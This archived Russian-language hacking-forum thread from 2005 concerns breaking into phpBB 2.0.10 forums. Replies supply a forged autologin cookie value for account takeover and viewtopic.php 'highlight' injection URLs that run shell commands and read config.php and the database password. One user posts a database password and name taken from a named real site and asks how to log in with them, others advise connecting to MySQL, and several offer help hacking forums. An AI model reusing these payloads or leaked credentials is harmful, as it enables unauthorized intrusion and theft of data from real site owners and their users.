Есть ли уязвимости в phpbb 2.0.10? [Архив]

Просмотр полной версии : Есть ли уязвимости в phpbb 2.0.10?

maR

09.11.2005, 17:52

возможен ли взлом? :o

GreenBear

09.11.2005, 17:57

sid удаляй, data заменяй на:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 225b81c5276ddf1c087a77f34f2cff1ba3%22%3Bs%3A6%3A%2 2userid%22%3Bi%3A8%3B%7D
в куках =))

koldun

09.11.2005, 17:58

сначало античат ПРОЧИТАЙ
Уязвимость в phpBB <= 2.0.10

http://[target]/forum/viewtopic.php?p=123&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db
Условия срабатывания - тема p=123 должна существовать.

Пример http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=$dbpasswd.%2527

m0nzt3r

09.11.2005, 18:22

а если лень руками вбивать идешь на rst.void.ru качаешь оотуда сплойт на перле для версии 2.0.10 и пользуешься на здоровье=) только вот не думаю что остались сайты с уязвимыми десятками..

*Van*

09.11.2005, 18:30

m0nzt3r, я вчера ломал челу форум phpbb 2.0.6 , где было зарегано 14300человек =)

maR, а если ничего не выйдет, смело стучись мне в асю, помогу!

Dark Angel

13.12.2005, 05:48

народ чота неработает наверно прикрыли!!!!!

vorishka

13.12.2005, 09:47

народ чота неработает наверно прикрыли!!!!!
А ты точно уверен что десятка стоит? Если не работает:
1. Руки...
2. Прикрыли...
Решение: попробуй снифак зафигачить...

*Van*

13.12.2005, 18:12

Dark Angel, стучись в асю или пиши в приват-помогу. =) Десятки(если это действительно десятки) ломаются легко.

Dark Angel

14.12.2005, 01:57

да ето десятка там снизу написена же
Powered by phpbb 2.0.10

NeMiNeM

14.12.2005, 02:26

Dark Angel
Админ там может написать всё что угодно для замыливания глаз))
На самом деле может быть пропатчен, или же новая версия стоять..
Всё равно удачи те!

Dark Angel

14.12.2005, 04:31

я тож так думаю!!!а как-нить можна узнавать какой версии етот форум

fixer2

14.12.2005, 07:48

У меня есть схожая проблема. Версия форума - 2.0.10, но он стоит на smallnuke. Какие варианты есть, подскажите?

...еще очень часто встречаю phpbb на пхп-нюках, как их ломать? Все говорят что нюк - самая бажная система, но тем не менее я не смог найти ни один сплоит или sql-inj для современных версий.

NeMiNeM

14.12.2005, 19:00

Dark Angel
Попробуй экслойты каких-нить других версий! Может для 2.0.18 или ниже подойдёт?
http://forum.antichat.ru/thread10613.html
Вот почитай!

Dark Angel

15.12.2005, 03:54

народ всё работает ето просто все пропеченые наверно паподались!!! после 3 часов поиска нашол нормалный вот он!!!!
http://www.gorodzelenogorsk.ru/forum/index.php

ну палучил вот ето:
dbpasswd---------PawHikat
dbname-----------host2254
заважу в FTP и нифега!!!!
чо может быть с партом ошибся????

Rebz

15.12.2005, 03:57

ну вообще-то если ты не видишь у тебя логин и пароль от БД, а не от ФТП.. =)

к сведению: Пароли БД не всегда подходят к ФТП.. так что коннект делай к MySQL =)
имхо)

Dark Angel

15.12.2005, 04:44

не понел обясника паподробнее чайнику!!!!!

Otaku

15.12.2005, 06:09

Подключись сразу к базе.
По теме
http://forum.antichat.ru/thread11738.html